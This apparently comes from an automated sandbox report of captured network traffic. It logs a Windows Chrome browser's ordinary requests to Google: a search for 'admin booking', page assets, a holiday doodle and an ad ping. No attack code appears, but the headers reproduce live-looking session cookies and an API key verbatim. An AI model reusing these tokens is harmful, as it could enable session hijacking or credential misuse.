NID=520=X6a7Fd_rViGoracy4lw9TFj2_q3swNzQbnEln5X1S9ACFei8-s7O75cbieLoz5PM6T7FXPsabIxL4LO2EGD5Xwg7S_LYJY-gGaF70HoN2X8gA48tmMkF41NO5ixXg3nly-pSU5HMXolkz-zcP4qDe2Ctvuj9Ei6dgXxG1phQHIc5kT3qEcyknLtgl0d3FGkdM9ylvFDbCA
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=admin+bookin&oit=4&cp=12&pgcl=7&gs_rn=42&psi=to7HRmLn1BxdAf9f&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=X6a7Fd_rViGoracy4lw9TFj2_q3swNzQbnEln5X1S9ACFei8-s7O75cbieLoz5PM6T7FXPsabIxL4LO2EGD5Xwg7S_LYJY-gGaF70HoN2X8gA48tmMkF41NO5ixXg3nly-pSU5HMXolkz-zcP4qDe2Ctvuj9Ei6dgXxG1phQHIc5kT3qEcyknLtgl0d3FGkdM9ylvFDbCA
Source: global traffic	HTTP traffic detected: GET /search?q=admin+booking&oq=admin+bookin&gs_lcrp=EgZjaHJvbWUqBwgBEAAYgAQyBggAEEUYOTIHCAEQABiABDIHCAIQABiABDIJCAMQABgKGIAEMgkIBBAAGAoYgAQyCQgFEAAYChiABDIHCAYQABiABDIHCAcQABiABDIHCAgQABiABDIHCAkQABiABNIBCDcxMjdqMGo3qAIAsAIA&sourceid=chrome&ie=UTF-8 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=X6a7Fd_rViGoracy4lw9TFj2_q3swNzQbnEln5X1S9ACFei8-s7O75cbieLoz5PM6T7FXPsabIxL4LO2EGD5Xwg7S_LYJY-gGaF70HoN2X8gA48tmMkF41NO5ixXg3nly-pSU5HMXolkz-zcP4qDe2Ctvuj9Ei6dgXxG1phQHIc5kT3qEcyknLtgl0d3FGkdM9ylvFDbCA
Source: global traffic	HTTP traffic detected: GET /search?q=admin+booking&oq=admin+bookin&gs_lcrp=EgZjaHJvbWUqBwgBEAAYgAQyBggAEEUYOTIHCAEQABiABDIHCAIQABiABDIJCAMQABgKGIAEMgkIBBAAGAoYgAQyCQgFEAAYChiABDIHCAYQABiABDIHCAcQABiABDIHCAgQABiABDIHCAkQABiABNIBCDcxMjdqMGo3qAIAsAIA&sourceid=chrome&ie=UTF-8&sei=vVGOZ-HkHNmChbIP4vXCoQE HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.google.com/search?q=admin+booking&oq=admin+bookin&gs_lcrp=EgZjaHJvbWUqBwgBEAAYgAQyBggAEEUYOTIHCAEQABiABDIHCAIQABiABDIJCAMQABgKGIAEMgkIBBAAGAoYgAQyCQgFEAAYChiABDIHCAYQABiABDIHCAcQABiABDIHCAgQABiABDIHCAkQABiABNIBCDcxMjdqMGo3qAIAsAIA&sourceid=chrome&ie=UTF-8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=qhUkcYS4VnZfeltyTh7MlS-EedRi6aCZEyKdnIAnugogGSTj5SnbIk16EH26PLCWUnEHg6C5Wdk7hPrhZHSkWdVDFKLT753v-upvT6GxybmN6HTByWnkysyLaXFWucGWu6uQyKanhWVpGIgZDftB6cEosa9wg2LofnqZlRtH6k8oYKbSmLNnIKSvVDTOEGYmxmaeGVW4E_lHbnOZOzQ95fw; SG_SS=*VmqaajLyAAaHFuaVpxZ96aKvGOYpM-oEADQBEArZ1FR2XU5x-3gsXB_wfjJ_DsZa9opdJww2MtWuuBzNPVU0KW7vOMiaBBRpA5eAcNcOPQAAAEFtAAAAClcBB0EANl7YN7hflbMIESTQiH42Sri0vXpjsy6uuJJVyk7S2Kx7rDPc4FLP6XdZCiNg2uV13hLew4p2KzUAGlMRagvioVZtTAVoVd_EeSlUnDyKeLBWwtG7pgIgkJr7YsN56fPVgz4pXGgfVpTsyJCIBdJ7TLVeSZ7ScFKWCKuBVwhcayDdO-jFx-2Wwu69ts3fQddel1bFwBFLz8SQAs_lOZzOGrHnE3h18gAk3_GWvs0gghJaEV4ubcFJUzgeka6aE7QMsU_r03iRkRT6BDzrxtAvRn26CzYT8J6YzeZpiIh0ti9WownbtYyDpvySItsjbB4GloNbJkisnR5p3zAdY2-ZJf7M4rWTd8FbjlYQS2wq26IBubrsquYjShd6Sju03YqnUutrZC01S1Hocc7Hl6_0Ax8MQuCyNNvJOqcGGH9sdHxTVJj_BD_mcshTrlxZtOWzKZLFd6uvaelMA3E_wfisB3KjCzV-RnY1480rvsNDouMPLeZm7sW85PRbiTfuV651oloS3s7W5VcgttDRnCmK63HFJxgiRSXF9tS0GSFqDZotJ0WtspXV9_ShlvwH0LoL8sdl335zJEPTJmIEWveXRJBFm7lzzLOy8kdT7k7AqiH6FonqlWB7tA9Z0H6-fJGe89hz3U507b9Za43MXnrvqSjNR_PThJYAq08Z4fOAFl2hlVGwzgpdByKN8H6Y3uGbbgbgbqBXG3sPJrhz2TGBj4OPCyqhqr2aOqtJjZKmiGZlS4B2t9F2xHgcsf1NpAt4uGaFD06mbzikOLLx_Z5ic638tqM9zkNa79DAZJigw7k7gGGDhYrrQot8xLNVtxNdIzWsCGdG5w
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.s.COjAbpxNAqc.L.B1.O/am=AJA6BAgBAAAgAACAEAAqAAgAAAAAAAAAAAAAAAAAAAAAAAAAACABAAAAQkAAAAAAABAAAAAQAQBAmQAAAIITAACwAwAAAAD4AAJxKgABAAAAACAASAAAAAAAAYAAoBACAAAIAAAAIAgAACAAgAMAAAQAAAQAAAAxMACAAQAAAAJAhIAAAARgAQAFCIAEoNy4AIgfABQQAAABACAAAIAS8AAMAyCoABjgAUAAAAAAAAAAAAAAgAAAIQAAGIACACCAAAA9AASADwBAEkQAgCEDAAIUAoAAAAAgAAAAAAABEAgAAABXADgGBiAAAAAAAAAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAAAAAAAAAAAAAAAAAAAAAACA/d=1/ed=1/br=1/rs=ACT90oEVd1B7ZSQV2iqeMFjBnEl9bQZt1A/m=X3N0Bf,attn,cdos,gwc,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,YV5bee,d,csi HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=QPCyWcJf8Eo9O5cabvbpn_gRxL_r8CrZmMf8Pxh0h_Ct27_oBsrkaI14j1aVAK53LMgqASB_D6lRzEM7dXMXJ-vHbemQzG85BKceHybZaEzajEnLzhfppSOHGX3wQME7CCEJD9ai9-NGHUp1PvUzyAemrkPToORXAIgDM82DNXd1d2JeOMHbEIMvGqBq9D1w8QTQe9j3haRHtHtduW1n_nQ3xUYWK6OuOERxKn6G-8fsHWlzoXC3e7FV
Source: global traffic	HTTP traffic detected: GET /logos/doodles/2025/dr-martin-luther-king-jr-day-2025-6753651837110587.2-shs.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=QPCyWcJf8Eo9O5cabvbpn_gRxL_r8CrZmMf8Pxh0h_Ct27_oBsrkaI14j1aVAK53LMgqASB_D6lRzEM7dXMXJ-vHbemQzG85BKceHybZaEzajEnLzhfppSOHGX3wQME7CCEJD9ai9-NGHUp1PvUzyAemrkPToORXAIgDM82DNXd1d2JeOMHbEIMvGqBq9D1w8QTQe9j3haRHtHtduW1n_nQ3xUYWK6OuOERxKn6G-8fsHWlzoXC3e7FV
Source: global traffic	HTTP traffic detected: GET /logos/doodles/2025/dr-martin-luther-king-jr-day-2025-6753651837110587.2-lsg.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=QPCyWcJf8Eo9O5cabvbpn_gRxL_r8CrZmMf8Pxh0h_Ct27_oBsrkaI14j1aVAK53LMgqASB_D6lRzEM7dXMXJ-vHbemQzG85BKceHybZaEzajEnLzhfppSOHGX3wQME7CCEJD9ai9-NGHUp1PvUzyAemrkPToORXAIgDM82DNXd1d2JeOMHbEIMvGqBq9D1w8QTQe9j3haRHtHtduW1n_nQ3xUYWK6OuOERxKn6G-8fsHWlzoXC3e7FV
Source: global traffic	HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/search?q=admin+booking&oq=admin+bookin&gs_lcrp=EgZjaHJvbWUqBwgBEAAYgAQyBggAEEUYOTIHCAEQABiABDIHCAIQABiABDIJCAMQABgKGIAEMgkIBBAAGAoYgAQyCQgFEAAYChiABDIHCAYQABiABDIHCAcQABiABDIHCAgQABiABDIHCAkQABiABNIBCDcxMjdqMGo3qAIAsAIA&sourceid=chrome&ie=UTF-8&sei=vVGOZ-HkHNmChbIP4vXCoQEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=QPCyWcJf8Eo9O5cabvbpn_gRxL_r8CrZmMf8Pxh0h_Ct27_oBsrkaI14j1aVAK53LMgqASB_D6lRzEM7dXMXJ-vHbemQzG85BKceHybZaEzajEnLzhfppSOHGX3wQME7CCEJD9ai9-NGHUp1PvUzyAemrkPToORXAIgDM82DNXd1d2JeOMHbEIMvGqBq9D1w8QTQe9j3haRHtHtduW1n_nQ3xUYWK6OuOERxKn6G-8fsHWlzoXC3e7FV
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.s.en.H22AvBquQQ0.2018.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAACAABQEIAAAAAABQAAAAAAAAAAAAABIAAAAAAAABASBASAgAgAAAAAAAsAAAAAgsAIEBAAAAAAAAAAIAAACAQARgv_84AAAAAAAAAAAAgAAQAQAAAACACwCAIKjdAAEAAAAAAgAAACAAAAAQAAAAAACgAAAAAAIAAABAAAAAAAAAAEAAAAAACADQDwAAAAAAAAAAAAAAEAAAAAACAAMUABDADwAAAAAAABwAAAAABAgAADgGBiAAAAAAAAAA9wDweEA4pLAAAAAAAAAAAAAAAACAACQI5kD6CwIQAAAAAAAAAAAAAAAAAABAiqCJyw0ACA/d=1/ed=1/dg=3/br=1/rs=ACT90oGGEUo7u1V13_2NKhQAMmblL9Y68Q/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;Afksuc:wMx0R;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DM55c:imLrKe;DMzTfb:fNTHad;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;FqHJkd:yQamIb;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IZrNqe:P8ha2c;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXJSm:ii1RGf;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;PqHfGe:im2cZe;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;Qw8Feb:jpavUe;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RCF5Sd:X1kBmd;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UVzb9c:IvPZ6d;Uvc8o:VDovNc;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VhA7bd:vAmQFf;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;ZMvdv:PHFPjb;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;Zen4yb:jMF88c;ZlOOMb:P0I0Ec;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bFZ6gf:RsDQqe;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;daB6be:lMxGPd;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;flqRgb:ox2Q7c;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hlqGX:FWz1ic;hsLsYc:Vl118;hwoVHd:zw4U8c;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;lbfkyf:MqGdUd;lkq0A:JyBE3e;mWzs9c:fz5ukf;mzW4Id:nYdusb;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;oVHXxc:HODIOb;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:ww04Df;qGV2uc:HHi04c;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb,yDVVkb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;ropkZ:UT1DG;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tGdRVe:CS1mob;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uknmt:GkPrzb;uuQkY:u2V3ud;vEYCNb:FaqsVd;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wJ4z0b:hbpajc;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;xBbsrc:NEW1Qc;xbe2wc:uRMPBc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YG
Source: global traffic	HTTP traffic detected: GET /logos/doodles/2025/dr-martin-luther-king-jr-day-2025-6753651837110587-s.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=QPCyWcJf8Eo9O5cabvbpn_gRxL_r8CrZmMf8Pxh0h_Ct27_oBsrkaI14j1aVAK53LMgqASB_D6lRzEM7dXMXJ-vHbemQzG85BKceHybZaEzajEnLzhfppSOHGX3wQME7CCEJD9ai9-NGHUp1PvUzyAemrkPToORXAIgDM82DNXd1d2JeOMHbEIMvGqBq9D1w8QTQe9j3haRHtHtduW1n_nQ3xUYWK6OuOERxKn6G-8fsHWlzoXC3e7FV
Source: global traffic	HTTP traffic detected: GET /pagead/1p-conversion/16521530460/?gad_source=1&adview_type=4&adview_query_id=CKn43_a1hIsDFYeLUAYdNWUfDA HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, triggerReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=QPCyWcJf8Eo9O5cabvbpn_gRxL_r8CrZmMf8Pxh0h_Ct27_oBsrkaI14j1aVAK53LMgqASB_D6lRzEM7dXMXJ-vHbemQzG85BKceHybZaEzajEnLzhfppSOHGX3wQME7CCEJD9ai9-NGHUp1PvUzyAemrkPToORXAIgDM82DNXd1d2JeOMHbEIMvGqBq9D1w8QTQe9j3haRHtHtduW1n_nQ3xUYWK6OuOERxKn6G-8fsHWlzoXC3e7FV
Source: global traffic	HTTP traffic detected: GET /verify/ADzY0WVOJetUEpt_Qm250zzsebmQnRnV2iP-hIyAfkhVWeyGU6_ZswN0OWg0Z_DHLog8CiU0UmcLODlK9APcufgmDxl7AGM5NxYhZswBdNpGR5iv2g HTTP/1.1Host: id.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlaHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-XafY3ule2CpicxVHaPNGnm6NDqHqLymmViSeA80ltt6qvvAZs5CyY; NID=520=QPCyWcJf8Eo9O5cabvbpn_gRxL_r8CrZmMf8Pxh0h_Ct27_oBsrkaI14j1aVAK53LMgqASB_D6lRzEM7dXMXJ-vHbemQzG85BKceHybZaEzajEnLzhfppSOHGX3wQME7CCEJD9ai9-NGHUp1PvUzyAemrkPToORXAIgDM82DNXd1d2JeOMHbEIMvGqBq9D1w8QTQe9j3haRHtHtduW1n_nQ3xUYWK6OuOERxKn6G-8fsHWlzoXC3e7FV
Source: global traffic	HTTP traffic detected: GET /images/nav_logo321.webp HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: 